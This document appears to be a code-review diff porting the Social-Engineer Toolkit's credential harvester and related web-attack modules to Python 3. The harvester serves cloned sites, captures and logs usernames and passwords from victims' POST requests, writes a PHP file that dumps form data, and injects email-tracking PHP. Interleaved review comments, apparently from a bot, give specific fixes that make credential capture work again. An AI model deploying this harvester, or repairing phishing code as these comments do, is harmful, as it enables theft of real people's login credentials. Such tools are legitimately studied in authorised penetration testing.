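Review bot: `open(setdir + "src/webattack/dll_hijacking/repository", "r")` concatenates without a separator and switches the base from the working directory to `setdir`, so unless `setdir` ends in `/` and also contains the source tree the path is wrong; the same applies to the second repository open and to `hijacking.dll`, and `os.path.join(definepath, "src", "webattack", "dll_hijacking", "repository")` would be the explicit form since `definepath` is already set above. Two Python 3 str/bytes mismatches remain: `data` comes from an `"rb"` file, so `data.replace(str(host), ipaddr + "\x00", 1)` with str arguments raises TypeError, and `stdout_value` from `communicate()` is bytes, so `re.search("Add files to archive", stdout_value)` with a str pattern raises as well — both need bytes operands, or `stdout_value` decoded first. `filename1` comes straight from `input()` into the `setdir + "/dll/..."` path and the `rar a ... *` step runs through `shell=True`; `os.path.basename(filename1)` and a list-form `subprocess` call avoid surprises from an operator-supplied name containing separators or shell metacharacters. The `fileopen` handles are read and never closed.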

src/webattack/fsattack/fsattacks.py Executable file → Normal file


src/webattack/fsattack/full.py Executable file → Normal file

@ -4,18 +4,18 @@
# Author: d4rk0
# twitter: @d4rk0s
from fsattacks import *
from .fsattacks import *
def mainFullScreenAttackLoadExample():
# Load And Start
# Load And Start
x = fullScreenAttacks()
# Checks config if set loads intro if not skips
x.phishMenuMain()
#if __name__ == "__main__":
# if __name__ == "__main__":
# Run if executed
mainFullScreenAttackLoadExample()
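Review bot: `from .fsattacks import *` is a relative import, which is only valid when this module is imported as part of a package; if full.py is ever run directly (the commented-out `__main__` guard suggests it was), Python 3 raises `ImportError: attempted relative import with no known parent package`, where the old `from fsattacks import *` worked from the script directory. Either keep both forms behind a `try`/`except ImportError`, or document at the top of the file that it must be imported through the package. The star import also hides where `fullScreenAttacks` comes from; `from .fsattacks import fullScreenAttacks` would make it explicit. Calling `mainFullScreenAttackLoadExample()` unconditionally at module level means importing the module starts the menu, which the surviving comment `# Run if executed` no longer describes accurately.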


@ -4,13 +4,13 @@ import sys
import os
import re
import cgi
import BaseHTTPServer
import SimpleHTTPServer
import http.server
import http.server
import socket
from SocketServer import BaseServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
from SocketServer import ThreadingMixIn
from socketserver import BaseServer
from http.server import SimpleHTTPRequestHandler
from http.server import HTTPServer, BaseHTTPRequestHandler
from socketserver import ThreadingMixIn
import threading
import datetime
import shutil
@ -29,21 +29,22 @@ from set_config import HARVESTER_LOG as logpath
sys.path.append(definepath)
if track_email == True:
print_status("You have selected to track user accounts, Apache will automatically be turned on to handle tracking of users.")
print_status(
"You have selected to track user accounts, Apache will automatically be turned on to handle tracking of users.")
apache_check = True
# detect openssl module
try:
from OpenSSL import SSL
# handle import error that openssl is not there
except ImportError:
print "Python OpenSSL wasn't detected, note that SSL compatibility is now turned off"
print("Python OpenSSL wasn't detected, note that SSL compatibility is now turned off")
############################################
# Credential harvester #
############################################
# define the current working directory
definepath=os.getcwd()
definepath = os.getcwd()
me = mod_name()
# append python to our current working directory
@ -52,134 +53,151 @@ sys.path.append(definepath)
# import the base setcore libraries
from src.core.setcore import *
attack_vector=""
fileopen=file(setdir + "/attack_vector", "r")
attack_vector = ""
fileopen = open(setdir + "/attack_vector", "r")
for line in fileopen:
line=line.rstrip()
line = line.rstrip()
if line == 'multiattack':
attack_vector='multiattack'
attack_vector = 'multiattack'
# if attack vector isnt the multiattack
if attack_vector != "multiattack":
print bcolors.RED + """
print(bcolors.RED + """
The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.""" + bcolors.ENDC
fields are available. Regardless, this captures all POSTs on a website.""" + bcolors.ENDC)
# see if we're tabnabbing or multiattack
homepath=os.getcwd()
homepath = os.getcwd()
# pull scraper
try: reload(src.webattack.harvester.scraper)
except: import src.webattack.harvester.scraper
try:
reload(src.webattack.harvester.scraper)
except:
import src.webattack.harvester.scraper
# GRAB DEFAULT PORT FOR WEB SERVER AND CHECK FOR COMMAND CENTER
command_center="off"
fileopen=file("/etc/setoolkit/set.config" , "r").readlines()
counter=0
command_center = "off"
fileopen = open("/etc/setoolkit/set.config", "r").readlines()
counter = 0
for line in fileopen:
line=line.rstrip()
match=re.search("WEB_PORT=", line)
line = line.rstrip()
match = re.search("WEB_PORT=", line)
if match:
line=line.replace("WEB_PORT=", "")
web_port=line
counter=1
match2=re.search("COMMAND_CENTER=ON", line)
line = line.replace("WEB_PORT=", "")
web_port = line
counter = 1
match2 = re.search("COMMAND_CENTER=ON", line)
if match2:
command_center="on"
command_center_write=file(setdir + "/cc_harvester_hit" % (setdir),"w")
command_center = "on"
command_center_write = open(
setdir + "/cc_harvester_hit" % (setdir), "w")
# if nada default port 80
if counter == 0: web_port=80
if counter == 0:
web_port = 80
# pull URL field
counter=0
fileopen=file(setdir + "/site.template","r").readlines()
counter = 0
fileopen = open(setdir + "/site.template", "r").readlines()
for line in fileopen:
line=line.rstrip()
match=re.search("URL=",line)
line = line.rstrip()
match = re.search("URL=", line)
if match:
RAW_URL=line.replace("URL=", "")
URL=line.replace("URL=http://", "")
URL=line.replace("URL=https://", "")
counter=1
RAW_URL = line.replace("URL=", "")
URL = line.replace("URL=http://", "")
URL = line.replace("URL=https://", "")
counter = 1
# this checks the set_config to see if we need to redirect to a different website instead of the one cloned
# this checks the set_config to see if we need to redirect to a different
# website instead of the one cloned
harvester_redirect = check_config("HARVESTER_REDIRECT=")
if harvester_redirect.lower() == "on":
URL = check_config("HARVESTER_URL=")
counter = 1
if counter== 0: URL=''
if counter == 0:
URL = ''
# set ssl flag to false by default (counter basically)
ssl_flag="false"
self_signed="false"
ssl_flag = "false"
self_signed = "false"
# SEE IF WE WANT TO USE SSL
fileopen=file("/etc/setoolkit/set.config" , "r").readlines()
fileopen = open("/etc/setoolkit/set.config", "r").readlines()
for line in fileopen:
line=line.rstrip()
match=re.search("WEBATTACK_SSL=ON", line)
line = line.rstrip()
match = re.search("WEBATTACK_SSL=ON", line)
if match:
# if we hit on ssl being on, set flag to true
ssl_flag='true'
ssl_flag = 'true'
# if flag is true begin prepping SSL stuff
if ssl_flag=='true':
if ssl_flag == 'true':
# set another loop for find other variables we need for SSL setup
for line in fileopen:
# strip line feeds and carriage returns
line=line.rstrip()
line = line.rstrip()
# begin search for flags we need
match=re.search("SELF_SIGNED_CERT=ON", line)
match = re.search("SELF_SIGNED_CERT=ON", line)
# if we hit, lets create our own certificate
if match:
self_signed="true"
self_signed = "true"
# need to import our ssl module for creating a CA
sys.path.append("src/core/ssl")
# import our ssl module
import setssl
subprocess.Popen("cp %s/CA/*.pem %s" % (setdir,setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
subprocess.Popen("cp %s/CA/*.pem %s" % (setdir, setdir),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# remove old junk we dont need anymore
subprocess.Popen("rm -rf %s/CA;cp *.pem %s" % (setdir,setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
subprocess.Popen("rm -rf %s/CA;cp *.pem %s" % (setdir, setdir),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# if user wants to specify his/her own PEM certificate
if self_signed== "false":
if self_signed == "false":
for line in fileopen:
line=line.rstrip()
line = line.rstrip()
# search for cert path
match=re.search("PEM_CLIENT=", line, flags=re.IGNORECASE)
match = re.search("PEM_CLIENT=", line, flags=re.IGNORECASE)
if match:
pem_client=line.replace("PEM_CLIENT=","")
pem_client = line.replace("PEM_CLIENT=", "")
if not os.path.isfile(pem_client):
print "\nUnable to find PEM file, check location and config again."
print("\nUnable to find PEM file, check location and config again.")
exit_set()
if os.path.isfile(pem_client):
subprocess.Popen("cp %s %s/newcert.pem" % (pem_client,setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
match2=re.search("PEM_SERVER=", line)
subprocess.Popen("cp %s %s/newcert.pem" % (pem_client, setdir),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
match2 = re.search("PEM_SERVER=", line)
if match2:
pem_server=line.replace("PEM_SERVER=","")
pem_server = line.replace("PEM_SERVER=", "")
if not os.path.isfile(pem_server):
print "\nUnable to find PEM file, check location and config again."
print("\nUnable to find PEM file, check location and config again.")
exit_set()
if os.path.isfile(pem_server):
subprocess.Popen("cp %s %s/newreq.pem" % (pem_server,setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
subprocess.Popen("cp %s %s/newreq.pem" % (pem_server, setdir),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# url decode for postbacks
def htc(m):
return chr(int(m.group(1),16))
return chr(int(m.group(1), 16))
# url decode
def urldecode(url):
rex=re.compile('%([0-9a-hA-H][0-9a-hA-H])',re.M)
return rex.sub(htc,url)
rex = re.compile('%([0-9a-hA-H][0-9a-hA-H])', re.M)
return rex.sub(htc, url)
# here is where we specify how many people actually visited versus fell for it
visits = file(setdir + "/visits.file", "a")
bites = file(setdir + "/bites.file", "a")
visits = open(setdir + "/visits.file", "a")
bites = open(setdir + "/bites.file", "a")
# SET Handler for handling POST requests and general setup through SSL
class SETHandler(BaseHTTPRequestHandler):
def setup(self):
# added a try except block in case of transmission errors
try:
@ -189,25 +207,25 @@ class SETHandler(BaseHTTPRequestHandler):
self.wfile = socket._fileobject(self.request, "wb", self.wbufsize)
# except errors and pass them
except: pass
except:
pass
# handle basic GET requests
def do_GET(self):
# import proper style css files here
# import proper style css files here
def handle_error(self, request, client_address):
"""Handle an error gracefully. May be overridden.
The default is to print a traceback and continue.
"""
print '-'*40
print 'Exception happened during processing of request from',
print client_address
print('-' * 40)
print('Exception happened during processing of request from', end=' ')
print(client_address)
import traceback
traceback.print_exc() # XXX But this goes to stderr!
print '-'*40
traceback.print_exc() # XXX But this goes to stderr!
print('-' * 40)
pass
counter = 0
# try block setup to catch transmission errors
@ -217,12 +235,12 @@ class SETHandler(BaseHTTPRequestHandler):
self.send_response(200)
self.send_header('Content_type', 'text/html')
self.end_headers()
fileopen=file(setdir + "/web_clone/index.html", "r")
fileopen = open(setdir + "/web_clone/index.html", "r")
for line in fileopen:
self.wfile.write(line)
# write out that we had a visit
visits.write("hit\n")
#visits.close()
# visits.close()
counter = 1
# used for index2
@ -230,33 +248,34 @@ class SETHandler(BaseHTTPRequestHandler):
self.send_response(200)
self.send_header('Content_type', 'text/html')
self.end_headers()
fileopen=file(setdir + "/web_clone/index2.html", "r")
fileopen = open(setdir + "/web_clone/index2.html", "r")
for line in fileopen:
self.wfile.write(line)
# write out that we had a visit
visits.write("hit\n")
#visits.close()
# visits.close()
counter = 1
else:
if os.path.isfile(setdir + "/web_clone/%s" % (self.path)):
self.send_response(200)
self.end_headers()
fileopen=file(setdir + "/web_clone/%s" % (self.path), "rb")
fileopen = open(setdir + "/web_clone/%s" %
(self.path), "rb")
for line in fileopen:
self.wfile.write(line)
# if the file wasn't found
if counter == 0:
if os.path.isfile(setdir + "/web_clone/%s" % (self.path)):
fileopen=file(setdir + "/web_clone/%s" % (self.path), "rb")
fileopen = open(setdir + "/web_clone/%s" %
(self.path), "rb")
for line in fileopen:
self.wfile.write(line)
fileopen.close()
# handle errors, log them and pass through
except Exception, e:
except Exception as e:
# log to set
log(e)
# pass exceptions to keep going
@ -266,82 +285,90 @@ class SETHandler(BaseHTTPRequestHandler):
def do_POST(self):
length = int(self.headers.getheader('content-length'))
qs = self.rfile.read(length)
url=urldecode(qs)
url = urldecode(qs)
# specify we had a bite
bites.write("hit\n")
url=url.split("&")
url = url.split("&")
# change path to root for append on file
os.chdir(homepath)
# put the params into site.template for later user
filewrite=file(setdir + "/site.template","a")
filewrite = open(setdir + "/site.template", "a")
filewrite.write("\n")
if not os.path.isfile("%s/src/logs/harvester.log" % (os.getcwd())):
filewrite3 = file("%s/src/logs/harvester.log" % os.getcwd(), "w")
filewrite3.write("")
filewrite3.close()
filewrite2 = file("%s/src/logs/harvester.log" % os.getcwd(), "a")
if not os.path.isfile("%s/src/logs/harvester.log" % (os.getcwd())):
filewrite3 = open("%s/src/logs/harvester.log" % os.getcwd(), "w")
filewrite3.write("")
filewrite3.close()
filewrite2 = open("%s/src/logs/harvester.log" % os.getcwd(), "a")
filewrite.write("\n\n")
print bcolors.RED+"[*] WE GOT A HIT! Printing the output:\r" + bcolors.GREEN
print(bcolors.RED + "[*] WE GOT A HIT! Printing the output:\r" + bcolors.GREEN)
for line in url:
counter=0
line=line.rstrip()
counter = 0
line = line.rstrip()
# if regular expression hit on user fields then do different
match=re.search("Email|email|login|logon|Logon|Login|user|username|Username",line)
match = re.search(
"Email|email|login|logon|Logon|Login|user|username|Username", line)
if match:
print bcolors.RED+"POSSIBLE USERNAME FIELD FOUND: "+line+"\r" + bcolors.GREEN
counter=1
match2=re.search("pwd|pass|uid|uname|Uname|userid|userID|USER|USERNAME|PIN|pin|password|Password|secret|Secret|Pass",line)
print(bcolors.RED + "POSSIBLE USERNAME FIELD FOUND: " + line + "\r" + bcolors.GREEN)
counter = 1
match2 = re.search(
"pwd|pass|uid|uname|Uname|userid|userID|USER|USERNAME|PIN|pin|password|Password|secret|Secret|Pass", line)
if match2:
# if you don't want to capture a password, turn this off, note not an exact science
# if you don't want to capture a password, turn this off, note
# not an exact science
log_password = check_config("HARVESTER_LOG_PASSWORDS=")
if log_password.lower() == "on":
print bcolors.RED+"POSSIBLE PASSWORD FIELD FOUND: "+line+"\r" + bcolors.GREEN
print(bcolors.RED + "POSSIBLE PASSWORD FIELD FOUND: " + line + "\r" + bcolors.GREEN)
else:
line = ""
counter=1
filewrite.write(cgi.escape("PARAM: "+line+"\n"))
filewrite2.write(line+"\n")
counter = 1
filewrite.write(cgi.escape("PARAM: " + line + "\n"))
filewrite2.write(line + "\n")
# if a counter hits at 0 then print this line
if counter==0:
print "PARAM: "+line+"\r"
if counter == 0:
print("PARAM: " + line + "\r")
# reset counter
counter=0
counter = 0
filewrite.write("BREAKHERE")
filewrite.close()
filewrite2.close()
if attack_vector != 'multiattack':
print bcolors.RED+"[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.\r\n\r\n" + bcolors.ENDC
print(bcolors.RED + "[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.\r\n\r\n" + bcolors.ENDC)
# pull URL field
counter=0
fileopen=file(setdir + "/site.template","r").readlines()
counter = 0
fileopen = open(setdir + "/site.template", "r").readlines()
for line in fileopen:
line=line.rstrip()
match=re.search("URL=",line)
line = line.rstrip()
match = re.search("URL=", line)
if match:
RAW_URL=line.replace("URL=", "")
URL=line.replace("URL=http://", "")
URL=line.replace("URL=https://", "")
counter=1
if counter== 0: URL=''
RAW_URL = line.replace("URL=", "")
URL = line.replace("URL=http://", "")
URL = line.replace("URL=https://", "")
counter = 1
if counter == 0:
URL = ''
# this checks the set_config to see if we need to redirect to a different website instead of the one cloned
# this checks the set_config to see if we need to redirect to a
# different website instead of the one cloned
harvester_redirect = check_config("HARVESTER_REDIRECT=")
if harvester_redirect.lower() == "on":
RAW_URL = check_config("HARVESTER_URL=")
counter = 1
# when done posting send them back to the original site
self.wfile.write('<html><head><meta HTTP-EQUIV="REFRESH" content="0; url=%s"></head></html>' % (RAW_URL))
self.wfile.write(
'<html><head><meta HTTP-EQUIV="REFRESH" content="0; url=%s"></head></html>' % (RAW_URL))
# set it back to our homepage
os.chdir(setdir + "/web_clone/")
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
"""Handle requests in a separate thread."""
def run():
# check if we are not running apache mode
@ -358,37 +385,46 @@ def run():
visits.close()
bites.close()
except: pass
except:
pass
if attack_vector != 'multiattack':
try: reload(src.webattack.harvester.report_generator)
except: import src.webattack.harvester.report_generator
try:
reload(src.webattack.harvester.report_generator)
except:
import src.webattack.harvester.report_generator
if attack_vector != 'multiattack':
return_continue()
os.chdir(homepath)
httpd.socket.close()
# handle the rest
except Exception, e:
print bcolors.RED + "[*] Looks like the web_server can't bind to 80. Are you running Apache?" + bcolors.ENDC
apache_stop = raw_input("Do you want to attempt to disable Apache? [y/n]: ")
except Exception as e:
print(bcolors.RED + "[*] Looks like the web_server can't bind to 80. Are you running Apache?" + bcolors.ENDC)
apache_stop = input(
"Do you want to attempt to disable Apache? [y/n]: ")
apache_counter = 0
if apache_stop == "yes" or apache_stop == "y" or apache_stop == "":
if os.path.isfile("/etc/init.d/apache2"):
subprocess.Popen("/etc/init.d/apache2 stop", shell=True).wait()
subprocess.Popen(
"/etc/init.d/apache2 stop", shell=True).wait()
apache_counter = 1
if os.path.isfile("/etc/init.d/httpd"):
subprocess.Popen("/etc/init.d/httpd stop", shell=True).wait()
subprocess.Popen("/etc/init.d/httpd stop",
shell=True).wait()
apache_counter = 1
if apache_counter == 1:
# check if we are running apache mode
print_status("Successfully stopped Apache. Starting the credential harvester.")
print_status("Harvester is ready, have victim browse to your site.")
print_status(
"Successfully stopped Apache. Starting the credential harvester.")
print_status(
"Harvester is ready, have victim browse to your site.")
if apache_check == False:
try:
try:
server = ThreadedHTTPServer(('', int(web_port)), SETHandler)
server = ThreadedHTTPServer(
('', int(web_port)), SETHandler)
server.serve_forever()
# handle keyboard interrupts
@ -398,10 +434,11 @@ def run():
visits.close()
bites.close()
except: pass
except:
pass
if attack_vector != 'multiattack':
sys.path.append("src/harvester")
import report_generator
from . import report_generator
if attack_vector != 'multiattack':
return_continue()
os.chdir(homepath)
@ -410,54 +447,62 @@ def run():
apache_counter = 0
if apache_counter == 0:
print bcolors.GREEN + "[*] Try disabling Apache and try SET again." + bcolors.ENDC
print "[*] Printing error: "+ str(e) + "\n"
print(bcolors.GREEN + "[*] Try disabling Apache and try SET again." + bcolors.ENDC)
print("[*] Printing error: " + str(e) + "\n")
return_continue()
exit_set()
# if we are using apache, then use the harvester php type that writes it out to post.php
# note just change the index.html to post somewhere else and rename the post.php to something else
# note just change the index.html to post somewhere else and rename the
# post.php to something else
if apache_check == True:
try:
ipaddr=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ipaddr = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ipaddr.connect(('127.0.0.1', int(web_port)))
ipaddr.settimeout(2)
if ipaddr: pass
if ipaddr:
pass
except Exception, e:
except Exception as e:
if os.path.isfile("/etc/init.d/apache2"):
apache_start = raw_input("[!] Apache may be not running, do you want SET to start the process? [y/n]: ")
apache_start = input(
"[!] Apache may be not running, do you want SET to start the process? [y/n]: ")
if apache_start == "y":
subprocess.Popen("/etc/init.d/apache2 start", shell=True).wait()
subprocess.Popen(
"/etc/init.d/apache2 start", shell=True).wait()
try:
apache_dir = check_config("APACHE_DIRECTORY=")
if os.path.isdir(apache_dir + "/html"): apache_dir = apache_dir + "/html"
print bcolors.GREEN + "Apache webserver is set to ON. Copying over PHP file to the website."
if os.path.isdir(apache_dir + "/html"):
apache_dir = apache_dir + "/html"
print(bcolors.GREEN + "Apache webserver is set to ON. Copying over PHP file to the website.")
except Exception, e:
print e
except Exception as e:
print(e)
print "Please note that all output from the harvester will be found under apache_dir/harvester_date.txt"
print "Feel free to customize post.php in the %s directory" % (apache_dir) + bcolors.ENDC
filewrite = file("%s/post.php" % (apache_dir), "w")
now=datetime.datetime.today()
filewrite.write("""<?php $file = 'harvester_%s.txt';file_put_contents($file, print_r($_POST, true), FILE_APPEND);?><meta http-equiv="refresh" content="0; url=%s" />""" % (now, RAW_URL))
print("Please note that all output from the harvester will be found under apache_dir/harvester_date.txt")
print("Feel free to customize post.php in the %s directory" % (apache_dir) + bcolors.ENDC)
filewrite = open("%s/post.php" % (apache_dir), "w")
now = datetime.datetime.today()
filewrite.write(
"""<?php $file = 'harvester_%s.txt';file_put_contents($file, print_r($_POST, true), FILE_APPEND);?><meta http-equiv="refresh" content="0; url=%s" />""" % (now, RAW_URL))
filewrite.close()
if os.path.isdir("/var/www/html"):
logpath = ("/var/www/html")
if os.path.isdir("/var/www/html"):
logpath = ("/var/www/html")
filewrite = file("%s/harvester_%s.txt" % (logpath,now), "w")
filewrite = open("%s/harvester_%s.txt" % (logpath, now), "w")
filewrite.write("")
filewrite.close()
# Check sys platform to perform chown
if sys.platform == "darwin":
subprocess.Popen("chown _www:_www '%s/harvester_%s.txt'" % (logpath,now), shell=True).wait()
subprocess.Popen("chown _www:_www '%s/harvester_%s.txt'" %
(logpath, now), shell=True).wait()
else:
subprocess.Popen("chown www-data:www-data '%s/harvester_%s.txt'" % (logpath,now), shell=True).wait()
subprocess.Popen("chown www-data:www-data '%s/harvester_%s.txt'" %
(logpath, now), shell=True).wait()
# if we are using webjacking, etc.
if os.path.isfile(setdir + "/web_clone/index2.html"):
@ -465,33 +510,42 @@ def run():
if os.path.isfile(apache_dir + "/index2.html"):
os.remove(apache_dir + "/index2.html")
shutil.copyfile(setdir + "/web_clone/index2.html", apache_dir + "/index2.html")
shutil.copyfile(setdir + "/web_clone/index2.html",
apache_dir + "/index2.html")
# here we specify if we are tracking users and such
if track_email == True:
fileopen = file (setdir + "/web_clone/index.html", "r")
fileopen = open(setdir + "/web_clone/index.html", "r")
data = fileopen.read()
data = data.replace("<body>", """<body><?php $file = 'harvester_%s.txt'; $queryString = ''; foreach ($_GET as $key => $value) { $queryString .= $key . '=' . $value . '&';}$query_string = base64_decode($queryString);file_put_contents($file, print_r("Email address recorded: " . $query_string . "\\n", true), FILE_APPEND);?>""" % (now))
filewrite = file(setdir + "/web_clone/index.2", "w")
data = data.replace(
"<body>", """<body><?php $file = 'harvester_%s.txt'; $queryString = ''; foreach ($_GET as $key => $value) { $queryString .= $key . '=' . $value . '&';}$query_string = base64_decode($queryString);file_put_contents($file, print_r("Email address recorded: " . $query_string . "\\n", true), FILE_APPEND);?>""" % (now))
filewrite = open(setdir + "/web_clone/index.2", "w")
filewrite.write(data)
filewrite.close()
os.remove(setdir + "/web_clone/index.html")
shutil.copyfile(setdir + "/web_clone/index.2", setdir + "/web_clone/index.html")
# copy the entire web_clone directory.
# Without this only index.php|html are copied even though the user may have chosen to import the entire directory in the set module.
shutil.copyfile(setdir + "/web_clone/index.2",
setdir + "/web_clone/index.html")
# copy the entire web_clone directory.
# Without this only index.php|html are copied even though the user
# may have chosen to import the entire directory in the set module.
copyfolder(setdir + "/web_clone", apache_dir)
if os.path.isfile("%s/index.html" % (apache_dir)):
os.remove("%s/index.html" % (apache_dir))
if track_email == False:
shutil.copyfile(setdir + "/web_clone/index.html", "%s/index.html" % (apache_dir))
shutil.copyfile(setdir + "/web_clone/index.html",
"%s/index.html" % (apache_dir))
if track_email == True:
shutil.copyfile(setdir + "/web_clone/index.html", "%s/index.php" % (apache_dir))
print_status("NOTE: The URL to click on is index.php NOT index.html with track emails.")
shutil.copyfile(setdir + "/web_clone/index.html",
"%s/index.php" % (apache_dir))
print_status(
"NOTE: The URL to click on is index.php NOT index.html with track emails.")
print_status("All files have been copied to %s" % (apache_dir))
if attack_vector != 'multiattack':
pause = raw_input("{Press return to continue}")
pause = input("{Press return to continue}")
class SecureHTTPServer(HTTPServer):
def __init__(self, server_address, HandlerClass):
BaseServer.__init__(self, server_address, HandlerClass)
# SSLv2 and SSLv3 supported
@ -500,71 +554,75 @@ class SecureHTTPServer(HTTPServer):
fpem_priv = 'newreq.pem'
fpem_cli = 'newcert.pem'
# establish private key
ctx.use_privatekey_file (fpem_priv)
ctx.use_privatekey_file(fpem_priv)
# establish public/client certificate
ctx.use_certificate_file(fpem_cli)
# setup the ssl socket
self.socket = SSL.Connection(ctx, socket.socket(self.address_family,self.socket_type))
self.socket = SSL.Connection(ctx, socket.socket(
self.address_family, self.socket_type))
# bind to interface
self.server_bind()
# activate the interface
self.server_activate()
def shutdown_request(self,request): request.shutdown()
def shutdown_request(self, request): request.shutdown()
def ssl_server(HandlerClass = SETHandler,ServerClass = SecureHTTPServer):
def ssl_server(HandlerClass=SETHandler, ServerClass=SecureHTTPServer):
# bind to all interfaces on 443
server_address = ('', 443) # (address, port)
server_address = ('', 443) # (address, port)
# setup the httpd server
httpd = ServerClass(server_address, HandlerClass)
# serve the httpd server until exit
httpd.serve_forever()
if track_email == True: webattack_email = True
if track_email == True:
webattack_email = True
# if emailer webattack, spawn email questions
if webattack_email == True:
try:
import src.phishing.smtp.client.smtp_web
except Exception, e:
except Exception as e:
reload(src.phishing.smtp.client.smtp_web)
# see if we're tabnabbing or multiattack
fileopen=file(setdir + "/attack_vector", "r")
fileopen = open(setdir + "/attack_vector", "r")
for line in fileopen:
line=line.rstrip()
line = line.rstrip()
if line == 'tabnabbing':
print bcolors.RED+ "\n[*] Tabnabbing Attack Vector is Enabled...Victim needs to switch tabs."
print(bcolors.RED + "\n[*] Tabnabbing Attack Vector is Enabled...Victim needs to switch tabs.")
if line == 'webjacking':
print bcolors.RED+ "\n[*] Web Jacking Attack Vector is Enabled...Victim needs to click the link."
print(bcolors.RED + "\n[*] Web Jacking Attack Vector is Enabled...Victim needs to click the link.")
if ssl_flag == 'true':
web_port="443"
web_port = "443"
# check for PEM files here
if not os.path.isfile(setdir + "/newreq.pem"):
print "PEM files not detected. SSL will not work properly."
print("PEM files not detected. SSL will not work properly.")
if not os.path.isfile(setdir + "/newcert.pem"):
print "PEM files not detected. SSL will not work properly."
print("PEM files not detected. SSL will not work properly.")
# copy over our PEM files
subprocess.Popen("cp %s/*.pem %s/web_clone/" % (setdir,setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
subprocess.Popen("cp %s/*.pem %s/web_clone/" % (setdir, setdir),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# copy patched socket over to web clone
definepath = os.getcwd()
# we need to move a modified version of socket to handle SSL
shutil.copyfile("%s/src/core/patched/socket.py" % (definepath) , "%s/socket.py" % (definepath))
shutil.copyfile("%s/src/core/patched/socket.py" %
(definepath), "%s/socket.py" % (definepath))
# head over to cloned dir
if apache_check == False:
os.chdir(setdir + "/web_clone/")
if attack_vector != "multiattack":
if apache_check == False:
print bcolors.BLUE+"[*] The Social-Engineer Toolkit Credential Harvester Attack\r\n[*] Credential Harvester is running on port "+web_port+"\r"
print "[*] Information will be displayed to you as it arrives below:\r" + bcolors.ENDC
print(bcolors.BLUE + "[*] The Social-Engineer Toolkit Credential Harvester Attack\r\n[*] Credential Harvester is running on port " + web_port + "\r")
print("[*] Information will be displayed to you as it arrives below:\r" + bcolors.ENDC)
else:
print bcolors.BLUE+"[*] Apache is set to ON - everything will be placed in your web root directory of apache."
print bcolors.BLUE+"[*] Files will be written out to the root directory of apache."
print bcolors.BLUE+"[*] ALL files are within your Apache directory since you specified it to ON."
print(bcolors.BLUE + "[*] Apache is set to ON - everything will be placed in your web root directory of apache.")
print(bcolors.BLUE + "[*] Files will be written out to the root directory of apache.")
print(bcolors.BLUE + "[*] ALL files are within your Apache directory since you specified it to ON.")
# catch all
try:
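Review bot: do_POST (hunk `@ -266,82 +285,90`) still reads the request through the Python 2 header API, `length = int(self.headers.getheader('content-length'))`; in Python 3 `self.headers` is an `http.client.HTTPMessage`, which has no `getheader`, so every POST raises AttributeError before anything is logged, and the port needs `length = int(self.headers.get('Content-Length', 0))`. The body then flows as bytes into the str-based `urldecode` (`self.rfile.read(length)` returns bytes in Python 3), and the text-file lines written with `self.wfile.write(line)` in do_GET and the meta-refresh reply at the end of do_POST must also be bytes, so the read should be decoded (`qs = self.rfile.read(length).decode('utf-8', 'replace')`) and each write encoded. While there, `urldecode`'s character class `[0-9a-hA-H]` admits `g` and `h`, which `int(..., 16)` in `htc` then rejects with ValueError; `urllib.parse.unquote_plus` is the drop-in replacement. The same Python 2-only call survives as a context line in setup, `socket._fileobject` (hunk `@ -189,25 +207,25`), where the bare `except: pass` hides the failure; setup's body begins above that hunk. In both `URL=` parsers (module top and do_POST) `URL = line.replace("URL=https://", "")` discards the result of the preceding `http://` replace, so an http URL keeps its `URL=http://` prefix.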


@ -15,6 +15,8 @@ if not os.path.isdir(setdir + "/reports/"):
#
# Colors below
class bcolors:
PURPLE = '\033[95m'
BLUE = '\033[94m'
@ -30,80 +32,85 @@ class bcolors:
definepath = os.getcwd()
# grab URL and report information
now=datetime.datetime.today()
fileopen=file(setdir + "/site.template", "r")
site_template = file(setdir + "/site.template", "r").readlines()
fileopen1=file("%s/src/core/reports/index.html" % (definepath), "r")
now = datetime.datetime.today()
fileopen = open(setdir + "/site.template", "r")
site_template = open(setdir + "/site.template", "r").readlines()
fileopen1 = open("%s/src/core/reports/index.html" % (definepath), "r")
for line in fileopen:
match=re.search("URL=", line)
match = re.search("URL=", line)
if match:
url=line.replace("URL=http://", "")
url=line.replace("URL=https://", "")
filewrite2=file(setdir + "/reports/%s.xml" % (now), "a")
url = line.replace("URL=http://", "")
url = line.replace("URL=https://", "")
filewrite2 = open(setdir + "/reports/%s.xml" % (now), "a")
filewrite2.write(r"""<?xml version="1.0" encoding='UTF-8'?>""" + "\n")
filewrite2.write(r"<harvester>" + "\n")
for line2 in fileopen1:
counter=0
filewrite=file(setdir + "/reports/%s.html" % (now), "a")
match1=re.search("REPLACEHEREDUDE", line2)
counter = 0
filewrite = open(setdir + "/reports/%s.html" % (now), "a")
match1 = re.search("REPLACEHEREDUDE", line2)
if match1:
line2=line2.replace("REPLACEHEREDUDE", url)
line2 = line2.replace("REPLACEHEREDUDE", url)
filewrite.write(line2)
url_xml=url.rstrip()
url_xml = url.rstrip()
filewrite2.write(" %s" % (url_xml) + "\n")
counter=1
match2=re.search("If this is blank, SET did not get a successful attempt on the website, sorry hoss..", line2)
counter = 1
match2 = re.search(
"If this is blank, SET did not get a successful attempt on the website, sorry hoss..", line2)
if match2:
line2=line2.replace("If this is blank, SET did not get a successful attempt on the website, sorry hoss..", "Report findings on %s<br><br>" % (url))
counter=1
line2 = line2.replace(
